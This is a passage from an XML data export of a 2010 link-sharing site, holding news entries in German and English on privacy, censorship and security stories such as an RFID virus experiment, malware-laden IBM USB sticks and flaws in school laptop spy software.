&lt;/p&gt;</field><field type="CharField" name="external_url">http://ak-zensur.de/2010/04/save-the-children.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/27/save-the-children-finnland-in-verteilung-von-kind.png</field><field type="SlugField" name="slug">save-the-children-finnland-in-verteilung-von-kind</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-27 16:46:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="190" model="submitter.newsentry"><field type="CharField" name="title">heise online - Forscher infiziert sich mit Computervirus</field><field type="TextField" name="excerpt">Ein britischer Forscher hat sich einen RFID-Chip implantiert, der Code für einen Computervirus enthält. Der Virus soll RFID-Lesegeräte infizieren und sich darüber wiederum in weitere RFID-Chips schreiben können.
In ersten Versuchen seines Proof-of-Concept soll es Mark Gasson von der Universität Reading bereits gelungen sein, seinen Virus über den in einen Finger implantierten Chip auf andere Systeme zu übertragen. Gasson, der unter anderem mit seinen Arbeiten zur Kopplung des menschlichen Nervensystems mit Computern bekannt wurde, will mit seinen Versuchen auf die Risiken der sich verbreitenden medizinischen RFID-Implantate aufmerksam machen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ein britischer Forscher hat sich einen RFID-Chip implantiert, der Code für einen Computervirus enthält. Der Virus soll RFID-Lesegeräte infizieren und sich darüber wiederum in weitere RFID-Chips schreiben können.
&lt;/p&gt;
&lt;p&gt;In ersten Versuchen seines Proof-of-Concept soll es Mark Gasson von der Universität Reading bereits gelungen sein, seinen Virus über den in einen Finger implantierten Chip auf andere Systeme zu übertragen. Gasson, der unter anderem mit seinen Arbeiten zur Kopplung des menschlichen Nervensystems mit Computern bekannt wurde, will mit seinen Versuchen auf die Risiken der sich verbreitenden medizinischen RFID-Implantate aufmerksam machen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Forscher-infiziert-sich-mit-Computervirus-1008216.html</field><field type="FileField" name="page_screenshot">page_shots/2010/06/07/heise-online-forscher-infiziert-sich.png</field><field type="SlugField" name="slug">heise-online-forscher-infiziert-sich</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-26 21:32:46</field><field to="show.pentashow" name="show" rel="ManyToOneRel">4</field><field type="CharField" name="tags_string">rfid virus</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="189" model="submitter.newsentry"><field type="CharField" name="title">School's Laptop Spying Software Exploitable from Anywhere</field><field type="TextField" name="excerpt">Remember the school laptops set up to allow staff to spy on the kids at home? It turns out that the spy software used, Absolute Manage, has hard-coded crypto keys. This means that if you hack one client, you've hacked them all.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Remember the school laptops set up to allow staff to spy on the kids at home? It turns out that the spy software used, Absolute Manage, has hard-coded crypto keys. This means that if you hack one client, you've hacked them all.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.freedom-to-tinker.com/blog/jhalderm/schools-laptop-spying-software-exploitable-anywhere</field><field type="FileField" name="page_screenshot">page_shots/2010/05/25/schools-laptop-spying-software-exploitable-from-a.png</field><field type="SlugField" name="slug">schools-laptop-spying-software-exploitable-from-a</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-25 17:45:19</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="188" model="submitter.newsentry"><field type="CharField" name="title">IBM distributes malware-infested freebies at AusCERT</field><field type="TextField" name="excerpt">Risky.Biz has confirmed IBM staff distributed malware-infected USB drives at the AusCERT security conference this week.
In a highly embarrassing admission, the company has sent a broadcast e-mail to all AusCERT attendees warning them of the security lapse.
"At the AusCERT conference this week, you may have collected a complimentary USB key from the IBM booth," the message reads. "Unfortunately we have discovered that some of these USB keys contained malware and we suspect that all USB keys may be affected."
IBM is not the first company to distribute malware at AusCERT -- Australian telco Telstra did exactly the same thing in 2008.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Risky.Biz has confirmed IBM staff distributed malware-infected USB drives at the AusCERT security conference this week.
&lt;/p&gt;
&lt;p&gt;In a highly embarrassing admission, the company has sent a broadcast e-mail to all AusCERT attendees warning them of the security lapse.
&lt;/p&gt;
&lt;p&gt;"At the AusCERT conference this week, you may have collected a complimentary USB key from the IBM booth," the message reads. "Unfortunately we have discovered that some of these USB keys contained malware and we suspect that all USB keys may be affected."
&lt;/p&gt;
&lt;p&gt;IBM is not the first company to distribute malware at AusCERT -- Australian telco Telstra did exactly the same thing in 2008.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://risky.biz/IBM-idiots</field><field type="FileField" name="page_screenshot">page_shots/2010/05/25/no_page_shot.png</field><field type="SlugField" name="slug">ibm-distributes-malware-infested-freebies-at-ausce</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-25 13:54:47</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="187" model="submitter.newsentry"><field type="CharField" name="title">Ireland's largest ISP begins disconnecting users who are accused of piracy</field><field type="TextField" name="excerpt">Ireland is the first country in the world where a system of "graduated response" is being put in place. Under the pilot scheme, Eircom customers who illegally share copyrighted music will get three warnings before having their broadband service cut off for a year.
The Irish Recorded Music Association (Irma), whose members include EMI, Sony, Universal and Warner, reached an out-of-court settlement with Eircom in February 2009 under which the telecoms company agreed to introduce such a system for its 750,000 broadband users.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ireland is the first country in the world where a system of "graduated response" is being put in place. Under the pilot scheme, Eircom customers who illegally share copyrighted music will get three warnings before having their broadband service cut off for a year.
The Irish Recorded Music Association (Irma), whose members include EMI, Sony, Universal and Warner, reached an out-of-court settlement with Eircom in February 2009 under which the telecoms company agreed to introduce such a system for its 750,000 broadband users.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.irishtimes.com/newspaper/frontpage/2010/0524/1224271013389.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/24/irelands-largest-isp-begins-disconnecting-users-w.png</field><field type="SlugField" name="slug">irelands-largest-isp-begins-disconnecting-users-w</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-24 14:45:50</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="186" model="submitter.newsentry"><field type="CharField" name="title">DARPA trying to beat block lists, deep packet inspection • The Register</field><field type="TextField" name="excerpt">The latest DARPA scheme is called Safer Warfighter Communications (SAFER), which sounds suitably martial. But what it is actually meant to do is "bypass techniques that suppress, localize, and/or corrupt information". Specifically, the SAFER technology will be able to bypass:
Internet Protocol (IP) address filtering or “blocking,” typically by blacklisting the IP addresses of websites or other services, possibly by the network operator, to deny the user access.
And also:
Content filtering that captures and analyzes the content of the users network traffic through deep packet inspection to check whether the traffic contains predefined signatures or sensitive keywords.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The latest DARPA scheme is called Safer Warfighter Communications (SAFER), which sounds suitably martial. But what it is actually meant to do is "bypass techniques that suppress, localize, and/or corrupt information". Specifically, the SAFER technology will be able to bypass:
&lt;/p&gt;
&lt;p&gt;Internet Protocol (IP) address filtering or “blocking,” typically by blacklisting the IP addresses of websites or other services, possibly by the network operator, to deny the user access.
And also:
&lt;/p&gt;
&lt;p&gt;Content filtering that captures and analyzes the content of the users network traffic through deep packet inspection to check whether the traffic contains predefined signatures or sensitive keywords.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/05/21/darpa_vs_block_lists_dpi/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/22/darpa-trying-to-beat-block-lists-deep-packet-insp.png</field><field type="SlugField" name="slug">darpa-trying-to-beat-block-lists-deep-packet-insp</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-22 00:52:29</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="185" model="submitter.newsentry"><field type="CharField" name="title">Encrypted Google search coming to a browser near you</field><field type="TextField" name="excerpt">http*S*://www.google.com in Beta</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;http&lt;em&gt;S&lt;/em&gt;://www.google.com in Beta
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/web/news/2010/05/encrypted-google-search-coming-to-a-browser-near-you.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/05/22/encrypted-google-search-coming-to-a-browser-near-y.png</field><field type="SlugField" name="slug">encrypted-google-search-coming-to-a-browser-near-y</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-22 00:09:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="184" model="submitter.newsentry"><field type="CharField" name="title">Fraud Bazaar Carders.cc Hacked &amp;mdash; Krebs on Security</field><field type="TextField" name="excerpt">Einbruch auf illegaler Account-Trader Seite. Grund: Schlecht administrierter Web-Server.
An online forum where criminals trade stolen financial account information has been attacked and information stolen. At least three files now being traded on a public site contain information stolen from
Carders.cc, the German underground forum, including communications between members. Ironically, a poorly configured server allowed the attackers to steal information from the group's database. The culprits
appear to be members of a group that says it wants to expose the forum's illegal activity.
</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Einbruch auf illegaler Account-Trader Seite. Grund: Schlecht administrierter Web-Server.
&lt;/p&gt;
&lt;p&gt;An online forum where criminals trade stolen financial account information has been attacked and information stolen. At least three files now being traded on a public site contain information stolen from
Carders.cc, the German underground forum, including communications between members. Ironically, a poorly configured server allowed the attackers to steal information from the group's database. The culprits
appear to be members of a group that says it wants to expose the forum's illegal activity.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://krebsonsecurity.com/2010/05/fraud-bazaar-carders-cc-hacked/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/fraud-bazaar-carderscc-hacked-mdash-krebs-on-s.png</field><field type="SlugField" name="slug">fraud-bazaar-carderscc-hacked-mdash-krebs-on-s</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 23:16:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="183" model="submitter.newsentry"><field type="CharField" name="title">Report: Facebook caught sharing secret data with advertisers</field><field type="TextField" name="excerpt">Facebook, MySpace, Digg etc. sold user data to advertisers. Biz model at work.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Facebook, MySpace, Digg etc. sold user data to advertisers. Biz model at work.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/tech-policy/news/2010/05/latest-facebook-blunder-secret-data-sharing-with-advertisers.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/report-facebook-caught-sharing-secret-data-with-a.png</field><field type="SlugField" name="slug">report-facebook-caught-sharing-secret-data-with-a</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 22:52:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="182" model="submitter.newsentry"><field type="CharField" name="title">Empire Strikes 30: Ars looks back at an amazing film</field><field type="TextField" name="excerpt">Also see the pacman anniversary</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Also see the pacman anniversary
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/media/news/2010/05/empire-strikes-30-ars-looks-back-at-an-amazing-film.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/empire-strikes-30-ars-looks-back-at-an-amazing-fi.png</field><field type="SlugField" name="slug">empire-strikes-30-ars-looks-back-at-an-amazing-fi</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 22:45:24</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="181" model="submitter.newsentry"><field type="CharField" name="title">Pac-Man is 30! Celebrate along with... Google? </field><field type="TextField" name="excerpt">30 years of addiction</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;30 years of addiction
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/gaming/news/2010/05/pac-man-is-30-celebrate-along-with-google.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/pac-man-is-30-celebrate-along-with-google.png</field><field type="SlugField" name="slug">pac-man-is-30-celebrate-along-with-google</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 22:42:33</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="6"></object></field></object><object pk="180" model="submitter.newsentry"><field type="CharField" name="title">heise online - IBM verteilt auf Sicherheitskonferenz infizierte USB-Sticks</field><field type="TextField" name="excerpt">The [warning mail](http://beastorbuddha.com/2010/05/21/ibm-letter-to-auscert-delegates-free-malware-giveaway/)</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;The &lt;a href="http://beastorbuddha.com/2010/05/21/ibm-letter-to-auscert-delegates-free-malware-giveaway/"&gt;warning mail&lt;/a&gt;
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/IBM-verteilt-auf-Sicherheitskonferenz-infizierte-USB-Sticks-1005425.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/heise-online-ibm-verteilt-auf-sicherheitskonfere.png</field><field type="SlugField" name="slug">heise-online-ibm-verteilt-auf-sicherheitskonfere</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 14:38:34</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="7"></object></field></object><object pk="179" model="submitter.newsentry"><field type="CharField" name="title">Clegg vows to restore British privacy - V3.co.uk - formerly vnunet.com</field><field type="TextField" name="excerpt">New Britisch Government will make it's promise to give privacy back to people true.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;New Britisch Government will make it's promise to give privacy back to people true.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.v3.co.uk/v3/news/2263368/clegg-promises-restore-british</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/clegg-vows-to-restore-british-privacy-v3couk.png</field><field type="SlugField" name="slug">clegg-vows-to-restore-british-privacy-v3couk</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 10:06:21</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="178" model="submitter.newsentry"><field type="CharField" name="title">Most browsers silently expose intimate viewing habits • The Register</field><field type="TextField" name="excerpt">Browser history attack optimised</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Browser history attack optimised
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/05/20/browser_history_attack/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/most-browsers-silently-expose-intimate-viewing-hab.png</field><field type="SlugField" name="slug">most-browsers-silently-expose-intimate-viewing-hab</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 10:03:09</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="5"></object></field></object><object pk="177" model="submitter.newsentry"><field type="CharField" name="title">School Spy Program Used on Students Contains Hacker-Friendly Security Hole | Threat Level | Wired.com</field><field type="TextField" name="excerpt"></field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html"></field><field type="CharField" name="external_url">http://www.wired.com/threatlevel/2010/05/lanrev</field><field type="FileField" name="page_screenshot">page_shots/2010/05/21/school-spy-program-used-on-students-contains-hacke.png</field><field type="SlugField" name="slug">school-spy-program-used-on-students-contains-hacke</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-21 10:01:31</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="176" model="submitter.newsentry"><field type="CharField" name="title">Humanistische Union: Publikationen: Grundrechte-Report: Ausgaben: Archiv: GRR 2010</field><field type="TextField" name="excerpt">
Ein Projekt der Humanistischen Union, der Gustav Heinemann-Initiative, des Komitees für Grundrechte und Demokratie, des Bundesarbeitskreises Kritischer Juragruppen, von Pro Asyl, des Republikanischen Anwältinnen- und Anwältevereins, der Vereinigung demokratischer Juristinnen und Juristen, der Internationalen Liga für Menschenrechte und der Neuen Richtervereinigung.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Ein Projekt der Humanistischen Union, der Gustav Heinemann-Initiative, des Komitees für Grundrechte und Demokratie, des Bundesarbeitskreises Kritischer Juragruppen, von Pro Asyl, des Republikanischen Anwältinnen- und Anwältevereins, der Vereinigung demokratischer Juristinnen und Juristen, der Internationalen Liga für Menschenrechte und der Neuen Richtervereinigung.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.humanistische-union.de/publikationen/grundrechte_report/ausgaben/archiv/2010/</field><field type="FileField" name="page_screenshot">page_shots/2010/05/20/humanistische-union-publikationen-grundrechte-re.png</field><field type="SlugField" name="slug">humanistische-union-publikationen-grundrechte-re</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-20 23:54:27</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="4"></object></field></object><object pk="175" model="submitter.newsentry"><field type="CharField" name="title">heise online - Frequenzauktion bringt 4,4 Milliarden Euro</field><field type="TextField" name="excerpt">Etwas auf dem komplett asozialen Prinzip der Frequenzaufteilung rumhacken. Eigentlich sollten nur noch dynamic, frequency selection and multicarrier scheduling scheme eingesetzt werden, wie z. B. bei WLAN. Da können alle funken und gucken halt vor dem Senden, ob die Frequenz frei ist. Damit bekommt man wesentlich mehr Daten durch die Luft. Gerade um die 800 MHz Frequenzen ist es schade.
So ist das, als ob nur die Busse eines Unternehmens für die Straßen zugelassen werden. Das Unternehmen bestimmt den Preis für die Nutzung.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Etwas auf dem komplett asozialen Prinzip der Frequenzaufteilung rumhacken. Eigentlich sollten nur noch dynamic, frequency selection and multicarrier scheduling scheme eingesetzt werden, wie z. B. bei WLAN. Da können alle funken und gucken halt vor dem Senden, ob die Frequenz frei ist. Damit bekommt man wesentlich mehr Daten durch die Luft. Gerade um die 800 MHz Frequenzen ist es schade.
&lt;/p&gt;
&lt;p&gt;So ist das, als ob nur die Busse eines Unternehmens für die Straßen zugelassen werden. Das Unternehmen bestimmt den Preis für die Nutzung.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Frequenzauktion-bringt-4-4-Milliarden-Euro-1004771.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/20/heise-online-frequenzauktion-bringt-44-milliard.png</field><field type="SlugField" name="slug">heise-online-frequenzauktion-bringt-44-milliard</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-20 23:49:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="174" model="submitter.newsentry"><field type="CharField" name="title">A Piece of Internet History</field><field type="TextField" name="excerpt">Duke to shut Usenet server, home to the first electronic newsgroups.
On May 20, Duke will shut down its Usenet server, which provides access to a worldwide electronic discussion network of newsgroups started in 1979 by two Duke graduate students, Tom Truscott and Jim Ellis.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Duke to shut Usenet server, home to the first electronic newsgroups.
&lt;/p&gt;
&lt;p&gt;On May 20, Duke will shut down its Usenet server, which provides access to a worldwide electronic discussion network of newsgroups started in 1979 by two Duke graduate students, Tom Truscott and Jim Ellis.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.dukenews.duke.edu/2010/05/usenet.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/20/a-piece-of-internet-history.png</field><field type="SlugField" name="slug">a-piece-of-internet-history</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-20 23:39:38</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="6"></object><object pk="8"></object></field></object><object pk="173" model="submitter.newsentry"><field type="CharField" name="title">RIA Novosti - Politik - International - Erfinder des ersten Geldautomaten ist tot</field><field type="TextField" name="excerpt">Erfinder des ersten Geldautomaten John Shepherd-Barron ist im Alter von 84 Jahren in Großbritannien gestorben.
Wir der Erfinder sich 2007 in einem Interview erinnerte, ist er auf die Idee mit dem Bankautomaten gekommen, nachdem ihm bei einer Bank gekündigt worden war.
„Es musste einen Weg geben, wie ich an mein Geld kommen konnte, überall in der Welt oder in Großbritannien“, sagte er damals.
Der erste Geldautomat wurde dann 1967 in einer Bank in London aufgestellt. Lediglich zehn britische Pfund konnten damals gezogen werden. Anfänglich wurden Schecks mit einer Codenummer für die Geldausgabe benutzt. Diese Schecks wurden zuvor in der Bank ausgegeben.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Erfinder des ersten Geldautomaten John Shepherd-Barron ist im Alter von 84 Jahren in Großbritannien gestorben.
&lt;/p&gt;
&lt;p&gt;Wir der Erfinder sich 2007 in einem Interview erinnerte, ist er auf die Idee mit dem Bankautomaten gekommen, nachdem ihm bei einer Bank gekündigt worden war.
&lt;/p&gt;
&lt;p&gt;„Es musste einen Weg geben, wie ich an mein Geld kommen konnte, überall in der Welt oder in Großbritannien“, sagte er damals.
&lt;/p&gt;
&lt;p&gt;Der erste Geldautomat wurde dann 1967 in einer Bank in London aufgestellt. Lediglich zehn britische Pfund konnten damals gezogen werden. Anfänglich wurden Schecks mit einer Codenummer für die Geldausgabe benutzt. Diese Schecks wurden zuvor in der Bank ausgegeben.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://de.rian.ru/world/20100520/126379573.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/20/ria-novosti-politik-international-erfinder-d.png</field><field type="SlugField" name="slug">ria-novosti-politik-international-erfinder-d</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-20 23:17:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object><object pk="6"></object></field></object><object pk="172" model="submitter.newsentry"><field type="CharField" name="title">VP8 / WebM von Google veröffentlicht</field><field type="TextField" name="excerpt">Good News, große Zahl von Supportern (IE, Chrome, Firefox, Opera) plus lange Liste von Firmen</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Good News, große Zahl von Supportern (IE, Chrome, Firefox, Opera) plus lange Liste von Firmen
&lt;/p&gt;</field><field type="CharField" name="external_url">http://webmproject.blogspot.com/2010/05/introducing-webm-open-web-media-project.html</field><field type="FileField" name="page_screenshot">page_shots/2010/05/20/vp8-webm-von-google-veroffentlicht.png</field><field type="SlugField" name="slug">vp8-webm-von-google-veroffentlicht</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-05-20 15:44:30</field><field to="show.pentashow" name="show" rel="ManyToOneRel">3</field><field type="CharField" name="tags_string"></field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object><object pk="3"></object></field></object><object pk="171" model="submitter.newsentry"><field type="CharField" name="title">Softwarepatent durch BGH bestätigt</field><field type="TextField" name="excerpt"> * After a landmark court ruling, the German perspective on the validity of software patents is now closer than ever to that of the US.
* Basically, Germany has now had its own Bilski case -- with the worst possible outcome for the opponents of software patents.
* Recently, the Enlarged Board of Appeal of the European Patent Office upheld that approach to software patents as well, effectively accepting that a computer program stored on a medium must be patentable in principle.
* Defense strategies such as the Defensive Patent License are needed now more than ever.
Inhalt:
A client-server software for the automatic generation of structured documents (such as XML or HTML) is an example of a patentable software invention.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;pre&gt;&lt;code&gt;* After a landmark court ruling, the German perspective on the validity of software patents is now closer than ever to that of the US.
* Basically, Germany has now had its own Bilski case -- with the worst possible outcome for the opponents of software patents.
* Recently, the Enlarged Board of Appeal of the European Patent Office upheld that approach to software patents as well, effectively accepting that a computer program stored on a medium must be patentable in principle.
* Defense strategies such as the Defensive Patent License are needed now more than ever.
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Inhalt:
A client-server software for the automatic generation of structured documents (such as XML or HTML) is an example of a patentable software invention.
